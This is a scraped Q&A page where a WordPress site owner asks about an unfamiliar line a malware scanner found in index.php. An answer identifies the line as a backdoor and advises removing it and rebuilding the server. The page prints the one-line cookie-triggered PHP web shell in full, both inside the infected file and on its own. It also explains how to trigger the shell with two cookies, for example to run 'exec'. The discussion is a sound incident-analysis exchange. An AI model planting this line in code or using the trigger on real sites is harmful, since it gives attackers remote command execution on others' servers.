php - Wordpress unfamiliar code in root files -


recently 1 of wp website files deleted "cxs scanner " , detected files in root folder

index.php' known exploit = [fingerprint match] [php cookie exploit [p1036]]

when compared file detected cookie exploit older version, noticed there line of code added file:

detected index.php

<?php  if (isset($_cookie["id"])) @$_cookie["user"]($_cookie["id"]);   /**  * front wordpress application. file doesn't anything, loads  * wp-blog-header.php , tells wordpress load theme.  *  * @package wordpress  */  /**  * tells wordpress load wordpress theme , output it.  *  * @var bool  */ define('wp_use_themes', true);  /** loads wordpress environment , template */ require( dirname( __file__ ) . '/wp-blog-header.php' ); 

older index.php

<?php /**  * front wordpress application. file doesn't anything, loads  * wp-blog-header.php , tells wordpress load theme.  *  * @package wordpress  */  /**  * tells wordpress load wordpress theme , output it.  *  * @var bool  */ define('wp_use_themes', true);  /** loads wordpress environment , template */ require( dirname( __file__ ) . '/wp-blog-header.php' ); 

i not php developer , on comparing line of code added flagged file:

if (isset($_cookie["id"])) @$_cookie["user"]($_cookie["id"]); 

should there or security flaw?

it backdoor/exploit.

in php can call functions variable name calling: $var(). same happening here.

<?php function echoit($string) {     echo $string; }  $func = 'echoit'; $func('test');  // dies ruft echoit() auf ?> 

(source: http://php.net/manual/de/functions.variable-functions.php)

to trigger exploit have send 2 cookies. 1 cookie named: user, function value , other 1 name "id" parameter want call with.

so user="exec", id="ls" call exec function parameter "ls".

it rather nice one...you should remove line files.

in addition: have find out why ended in there first place. there can other backdoors on system well. should consider server compromised. hacked systems should burned down. can rise ashes beautiful phoenix again (or so). nevertheless, should rebuild system up-to-date software , data backup clean , change passwords.


Comments

Popular posts from this blog

scala - 'wrong top statement declaration' when using slick in IntelliJ -

c# - DevExpress.Wpf.Grid.InfiniteGridSizeException was unhandled -

PySide and Qt Properties: Connecting signals from Python to QML -